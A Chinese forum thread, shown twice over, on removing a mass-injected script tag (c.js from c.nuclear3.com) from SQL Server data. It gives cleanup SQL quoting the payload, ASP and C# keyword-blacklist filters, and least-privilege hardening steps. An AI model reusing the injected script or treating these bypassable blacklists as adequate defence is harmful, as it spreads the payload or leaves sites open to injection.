SQL注入问题,com/css/c.js病毒的清除方法。 最近流行的病毒SQL代码:Script Src=http://c.nu%63%6Cear3.com/css/c.js> 现已找到解决办法。 暂时清除的办法可以使用如下命令: update 表名 set 表项=replace(cast(表项 as varchar(8000)),’病毒代码段’,’’)如下我写的一段标准的: update hezu set Xiaoqm=replace(cast(Xiaoqm as varchar(8000)),'<ScriptSrc=http://c.nu%63%6Cear3.com/css/c.js></Script>','')这个可以回车换行后,多条一起执行的。
在查询分析器中执行即可。
直接的清除方法,需要在CONN.ASP中加入: 如下代码:
<% function tabConvert(str) dim tempstr dim theStr dim canConvert dim theChr tempStr=str theChr="" theStr="" canConvert=1 for i=1 to len(tempStr) theChr=mid(tempStr,i,1) if theChr="<" then canConvert=0 end if if theChr=">" then canConvert=1 end if if theChr=" " and canConvert=1 then theChr= " " end if theStr=theStr&theChr next theStr=replace(theStr,chr(13),"<br>") tabConvert=theStr End function %><% Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_ZxFy_Cl = 3 ' Fy_Zx = "http://www.1jia.cc" ' On Error Resume Next Fy_Url=Request.ServerVariables("QUERY_STRING") Fy_a=split(Fy_Url,"&") redim Fy_Cs(ubound(Fy_a)) On Error Resume Next for Fy_x=0 to ubound(Fy_a) Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1) Next For Fy_x=0 to ubound(Fy_Cs) If Fy_Cs(Fy_x)<>"" Then If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 orInstr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then Select Case Fy_Cl Case "1" Response.Write "<Script Language=JavaScript>alert(' oh "&Fy_Cs(Fy_x)&" wrong!\n\nplease not:and,select,update,insert,delete,chr !\n\nNot SQL,goout!');window.close();</Script>" Case "2" Response.Write "<Script Language=JavaScript>location.href='"&Fy_Zx&"'</Script>" Case "3" Response.Write "<Script Language=JavaScript>alert(' go out!go out "&Fy_Cs(Fy_x)&"go out!\n\n go out:,and,select,update,insert,delete,chr go out!\n\ngoout!');location.href='"&Fy_Zx&"';</Script>" End Select Response.End End If End If Next %> <% Function Checkstr(Str) If Isnull(Str) Then CheckStr = "" Exit Function End If Str = Replace(Str,Chr(0),"", 1, -1, 1) Str = Replace(Str,"<","<", 1, -1, 1) Str = Replace(Str,">",">", 1, -1, 1) Str = Replace(Str, "script", "script", 1, -1, 0) Str = Replace(Str, "SCRIPT", "SCRIPT", 1, -1, 0) Str = Replace(Str, "Script", "Script", 1, -1, 0) Str = Replace(Str, "script", "Script", 1, -1, 1) Str = Replace(Str, "object", "object", 1, -1, 0) Str = Replace(Str, "OBJECT", "OBJECT", 1, -1, 0) Str = Replace(Str, "Object", "Object", 1, -1, 0) Str = Replace(Str, "object", "Object", 1, -1, 1) Str = Replace(Str, "applet", "applet", 1, -1, 0) Str = Replace(Str, "APPLET", "APPLET", 1, -1, 0) Str = Replace(Str, "Applet", "Applet", 1, -1, 0) Str = Replace(Str, "applet", "Applet", 1, -1, 1) Str = Replace(Str, "[", "[") Str = Replace(Str, "]", "]") Str = Replace(Str, """", "", 1, -1, 1) Str = Replace(Str, "=", "=", 1, -1, 1) Str = Replace(Str, "'", "''", 1, -1, 1) Str = Replace(Str, "select", "select", 1, -1, 1) Str = Replace(Str, "execute", "execute", 1, -1, 1) Str = Replace(Str, "exec", "exec", 1, -1, 1) Str = Replace(Str, "join", "join", 1, -1, 1) Str = Replace(Str, "union", "union", 1, -1, 1) Str = Replace(Str, "where", "where", 1, -1, 1) Str = Replace(Str, "insert", "insert", 1, -1, 1) Str = Replace(Str, "delete", "delete", 1, -1, 1) Str = Replace(Str, "update", "update", 1, -1, 1) Str = Replace(Str, "like", "like", 1, -1, 1) Str = Replace(Str, "drop", "drop", 1, -1, 1) Str = Replace(Str, "create", "create", 1, -1, 1) Str = Replace(Str, "rename", "rename", 1, -1, 1) Str = Replace(Str, "count", "count", 1, -1, 1) Str = Replace(Str, "chr", "chr", 1, -1, 1) Str = Replace(Str, "mid", "mid", 1, -1, 1) Str = Replace(Str, "truncate", "truncate", 1, -1, 1) Str = Replace(Str, "nchar", "nchar", 1, -1, 1) Str = Replace(Str, "char", "char", 1, -1, 1) Str = Replace(Str, "alter", "alter", 1, -1, 1) Str = Replace(Str, "cast", "cast", 1, -1, 1) Str = Replace(Str, "exists", "exists", 1, -1, 1) Str = Replace(Str,Chr(13),"<br>", 1, -1, 1) CheckStr = Replace(Str,"'","''", 1, -1, 1) End Function %> 好了,如果你还有不明白的,可以联系我QQ:528407
防止SQL注入。在global加 void Application_BeginRequest(Object sender, EventArgs e) { StartProcessRequest(); } #region private void StartProcessRequest() { try { string getkeys = ""; string sqlErrorPage = "index.aspx"; if (System.Web.HttpContext.Current.Request.QueryString != null) { for (int i = 0; i < System.Web.HttpContext.Current.Request.QueryString.Count; i++) { getkeys = System.Web.HttpContext.Current.Request.QueryString.Keys[i]; if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.QueryString[getkeys])) { System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage); System.Web.HttpContext.Current.Response.End(); } } } if (System.Web.HttpContext.Current.Request.Form != null) { for (int i = 0; i < System.Web.HttpContext.Current.Request.Form.Count; i++) { getkeys = System.Web.HttpContext.Current.Request.Form.Keys[i]; if (getkeys == "__VIEWSTATE") continue; if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.Form[getkeys])) { System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage); System.Web.HttpContext.Current.Response.End(); } } } } catch { // 错误处理: 处理用户提交信息! } } private bool ProcessSqlStr(string Str) { bool ReturnValue = true; try { if (Str.Trim() != "") { string SqlStr = "exec¦insert¦select¦delete¦master¦update¦truncate¦declare"; string[] anySqlStr = SqlStr.Split('¦'); foreach (string ss in anySqlStr) { if(!Str.ToLower().Contains("updatepanel")) { if (Str.ToLower().IndexOf(ss) >= 0) { ReturnValue = false; break; } } } } } catch { ReturnValue = false; } return ReturnValue; } #endregion
环境:tomcat + SQL 2005 问题:SQL2005中文本字段http://3b3.org/cs.js 批量注入过程:2个月前发现时,我只以为单纯数据库被攻击,查了很多资料,大多是对asp和iis的文章。没法,我只好改了1433端口,发现sql的日志文件每2分钟有一个sa的认证失败的过程。改数据库和服务器密码后,三天又发作。后来换了一个数据库服务器一周没到又发作。然后补应用程序的注入点,一周后又轮陷。接下来就不是程序员的事了。最后使用设置sql权限的以下方法后,暂时没有发作。希望对楼主有点帮助:1.用windows身份验证方式,登录SQL manageMent studio,在服务器“安全性”》登录名》sa 属性里的状态,登录设为禁用 2.在服务器“安全性”》登录名新建一个用户 如:用户名为abc@2009 密码:a0110b0110+12345-O 3.在服务器“安全性”》登录名》abc@2009 属性,映射到网站的数据库中。这样这个用户就有了这个数据库的权限。然后把其它登录名的网站映谢前的勾去掉。 4.创建一个角色abccoder_role 方法如下: 先执行一下语句,创建角色: (只有增,删,改,查的权限) 新建一个查询,输入以下代码后点运行。 use tempdb Create ROLE abccoder_role 再分配权限给abccoder_role: use tempdb GRANT select TO abccoder_role; GRANT update TO abccoder_role; GRANT insert TO abccoder_role; GRANT delete TO abccoder_role; 5.在网站数据库的目录下的安全性》用户》abc@2009》属性中 只勾选abccoder_role 角色。用以下代码测试: 通过以下代码检测(失败表示权限正确,如能显示出来则表明权限太高): DECLARE @T varchar(255), @C varchar(255) DECLARE Table_Cursor CURSOR FOR Select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype= 'u ' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN print @c FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor 6.把原来web应用的数据库联接改成这个用户的。这样基本上可以不用担心被批量挂c.js上,不过对手工单个攻击还没想到更好的办法。这个只能一起再努力了。
我找了很多人,但是都没有给我解决掉。骗子太多了。现在我站出来,希望能帮助大家解决掉问题,如果你的站也跟我说的一样,请按照我的文字做下去。
最终还是通过自己写的代码解决了问题。
SQL注入问题,com/css/c.js病毒的清除方法。
最近流行的病毒SQL代码:Script Src=http://c.nu%63%6Cear3.com/css/c.js>
现已找到解决办法。
暂时清除的办法可以使用如下命令:
update 表名 set 表项=replace(cast(表项 as varchar(8000)),’病毒代码段’,’’)如下我写的一段标准的:
update hezu set Xiaoqm=replace(cast(Xiaoqm as varchar(8000)),'<ScriptSrc=http://c.nu%63%6Cear3.com/css/c.js></Script>','')这个可以回车换行后,多条一起执行的。
在查询分析器中执行即可。
直接的清除方法,需要在CONN.ASP中加入:
如下代码:
<%
function tabConvert(str)
dim tempstr
dim theStr
dim canConvert
dim theChr
tempStr=str
theChr=""
theStr=""
canConvert=1
for i=1 to len(tempStr)
theChr=mid(tempStr,i,1)
if theChr="<" then
canConvert=0
end if
if theChr=">" then
canConvert=1
end if
if theChr=" " and canConvert=1 then
theChr= " "
end if
theStr=theStr&theChr
next
theStr=replace(theStr,chr(13),"<br>")
tabConvert=theStr
End function
%><%
Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_ZxFy_Cl = 3 '
Fy_Zx = "http://www.1jia.cc" '
On Error Resume Next
Fy_Url=Request.ServerVariables("QUERY_STRING")
Fy_a=split(Fy_Url,"&")
redim Fy_Cs(ubound(Fy_a))
On Error Resume Next
for Fy_x=0 to ubound(Fy_a)
Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)
Next
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 orInstr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
Select Case Fy_Cl
Case "1"
Response.Write "<Script Language=JavaScript>alert(' oh "&Fy_Cs(Fy_x)&" wrong!\n\nplease not:and,select,update,insert,delete,chr !\n\nNot SQL,goout!');window.close();</Script>"
Case "2"
Response.Write "<Script Language=JavaScript>location.href='"&Fy_Zx&"'</Script>"
Case "3"
Response.Write "<Script Language=JavaScript>alert(' go out!go out "&Fy_Cs(Fy_x)&"go out!\n\n go out:,and,select,update,insert,delete,chr go out!\n\ngoout!');location.href='"&Fy_Zx&"';</Script>"
End Select
Response.End
End If
End If
Next
%>
<%
Function Checkstr(Str)
If Isnull(Str) Then
CheckStr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"", 1, -1, 1)
Str = Replace(Str,"<","<", 1, -1, 1)
Str = Replace(Str,">",">", 1, -1, 1)
Str = Replace(Str, "script", "script", 1, -1, 0)
Str = Replace(Str, "SCRIPT", "SCRIPT", 1, -1, 0)
Str = Replace(Str, "Script", "Script", 1, -1, 0)
Str = Replace(Str, "script", "Script", 1, -1, 1)
Str = Replace(Str, "object", "object", 1, -1, 0)
Str = Replace(Str, "OBJECT", "OBJECT", 1, -1, 0)
Str = Replace(Str, "Object", "Object", 1, -1, 0)
Str = Replace(Str, "object", "Object", 1, -1, 1)
Str = Replace(Str, "applet", "applet", 1, -1, 0)
Str = Replace(Str, "APPLET", "APPLET", 1, -1, 0)
Str = Replace(Str, "Applet", "Applet", 1, -1, 0)
Str = Replace(Str, "applet", "Applet", 1, -1, 1)
Str = Replace(Str, "[", "[")
Str = Replace(Str, "]", "]")
Str = Replace(Str, """", "", 1, -1, 1)
Str = Replace(Str, "=", "=", 1, -1, 1)
Str = Replace(Str, "'", "''", 1, -1, 1)
Str = Replace(Str, "select", "select", 1, -1, 1)
Str = Replace(Str, "execute", "execute", 1, -1, 1)
Str = Replace(Str, "exec", "exec", 1, -1, 1)
Str = Replace(Str, "join", "join", 1, -1, 1)
Str = Replace(Str, "union", "union", 1, -1, 1)
Str = Replace(Str, "where", "where", 1, -1, 1)
Str = Replace(Str, "insert", "insert", 1, -1, 1)
Str = Replace(Str, "delete", "delete", 1, -1, 1)
Str = Replace(Str, "update", "update", 1, -1, 1)
Str = Replace(Str, "like", "like", 1, -1, 1)
Str = Replace(Str, "drop", "drop", 1, -1, 1)
Str = Replace(Str, "create", "create", 1, -1, 1)
Str = Replace(Str, "rename", "rename", 1, -1, 1)
Str = Replace(Str, "count", "count", 1, -1, 1)
Str = Replace(Str, "chr", "chr", 1, -1, 1)
Str = Replace(Str, "mid", "mid", 1, -1, 1)
Str = Replace(Str, "truncate", "truncate", 1, -1, 1)
Str = Replace(Str, "nchar", "nchar", 1, -1, 1)
Str = Replace(Str, "char", "char", 1, -1, 1)
Str = Replace(Str, "alter", "alter", 1, -1, 1)
Str = Replace(Str, "cast", "cast", 1, -1, 1)
Str = Replace(Str, "exists", "exists", 1, -1, 1)
Str = Replace(Str,Chr(13),"<br>", 1, -1, 1)
CheckStr = Replace(Str,"'","''", 1, -1, 1)
End Function
%> 好了,如果你还有不明白的,可以联系我QQ:528407
保证你不再被入侵。
建议不要直接使用SQL语句,很容易被注入,国内的SQL注入水平还差点,可以到国外网站看看,很吓人的
最好写存储过程,用配置文件保存SQL连接
你这种只能是暂时的。如果它用木马后门程序或者DDOS去攻击的你的服务器,创建系统用户,这种根本没用。
void Application_BeginRequest(Object sender, EventArgs e)
{
StartProcessRequest(); } #region
private void StartProcessRequest()
{
try
{
string getkeys = "";
string sqlErrorPage = "index.aspx";
if (System.Web.HttpContext.Current.Request.QueryString != null)
{ for (int i = 0; i < System.Web.HttpContext.Current.Request.QueryString.Count; i++)
{
getkeys = System.Web.HttpContext.Current.Request.QueryString.Keys[i];
if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.QueryString[getkeys]))
{
System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);
System.Web.HttpContext.Current.Response.End();
}
}
}
if (System.Web.HttpContext.Current.Request.Form != null)
{
for (int i = 0; i < System.Web.HttpContext.Current.Request.Form.Count; i++)
{
getkeys = System.Web.HttpContext.Current.Request.Form.Keys[i];
if (getkeys == "__VIEWSTATE") continue;
if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.Form[getkeys]))
{
System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);
System.Web.HttpContext.Current.Response.End();
}
}
}
}
catch
{
// 错误处理: 处理用户提交信息!
}
}
private bool ProcessSqlStr(string Str)
{
bool ReturnValue = true;
try
{
if (Str.Trim() != "")
{
string SqlStr = "exec¦insert¦select¦delete¦master¦update¦truncate¦declare";
string[] anySqlStr = SqlStr.Split('¦');
foreach (string ss in anySqlStr)
{
if(!Str.ToLower().Contains("updatepanel"))
{
if (Str.ToLower().IndexOf(ss) >= 0)
{
ReturnValue = false;
break;
}
}
}
}
}
catch
{
ReturnValue = false;
}
return ReturnValue;
}
#endregion
问题:SQL2005中文本字段http://3b3.org/cs.js 批量注入过程:2个月前发现时,我只以为单纯数据库被攻击,查了很多资料,大多是对asp和iis的文章。没法,我只好改了1433端口,发现sql的日志文件每2分钟有一个sa的认证失败的过程。改数据库和服务器密码后,三天又发作。后来换了一个数据库服务器一周没到又发作。然后补应用程序的注入点,一周后又轮陷。接下来就不是程序员的事了。最后使用设置sql权限的以下方法后,暂时没有发作。希望对楼主有点帮助:1.用windows身份验证方式,登录SQL manageMent studio,在服务器“安全性”》登录名》sa 属性里的状态,登录设为禁用
2.在服务器“安全性”》登录名新建一个用户 如:用户名为abc@2009 密码:a0110b0110+12345-O
3.在服务器“安全性”》登录名》abc@2009 属性,映射到网站的数据库中。这样这个用户就有了这个数据库的权限。然后把其它登录名的网站映谢前的勾去掉。
4.创建一个角色abccoder_role
方法如下:
先执行一下语句,创建角色: (只有增,删,改,查的权限)
新建一个查询,输入以下代码后点运行。
use tempdb
Create ROLE abccoder_role
再分配权限给abccoder_role:
use tempdb
GRANT select TO abccoder_role;
GRANT update TO abccoder_role;
GRANT insert TO abccoder_role;
GRANT delete TO abccoder_role; 5.在网站数据库的目录下的安全性》用户》abc@2009》属性中 只勾选abccoder_role 角色。用以下代码测试:
通过以下代码检测(失败表示权限正确,如能显示出来则表明权限太高):
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype= 'u ' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
6.把原来web应用的数据库联接改成这个用户的。这样基本上可以不用担心被批量挂c.js上,不过对手工单个攻击还没想到更好的办法。这个只能一起再努力了。